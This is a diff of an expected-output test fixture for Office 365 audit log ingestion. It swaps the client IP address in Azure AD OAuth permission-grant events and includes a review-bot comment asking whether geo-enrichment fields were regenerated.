@@ -13754,7 +13754,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -13784,9 +13784,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:30:06",
 "ExtendedProperties": [
 {
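Review bot: The equal old/new counts in `@@ -13784,9 +13784,9 @@` show that only the two IP strings were swapped and no other line of the expected document changed; if the ingest pipeline geo-enriches `ClientIP`/`ActorIpAddress` — presumably the motivation for the "supported subset" named in the changelog — the expected output should also gain or change the corresponding geo fields, which a search-and-replace would miss. The same pattern repeats in the hunks at `@@ -14050`, `@@ -14316` and `@@ -14582`. The paired `event.original` hunks at `@@ -14020`, `@@ -14286` and `@@ -14552` are only correct if the input test log was changed identically, since `event.original` has to match the raw event byte for byte, and nothing in this file can confirm that. Please confirm this expected file was regenerated from the pipeline rather than edited by hand, or note in the PR why no geo fields appear for the new address.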
@@ -14020,7 +14020,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -14050,9 +14050,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
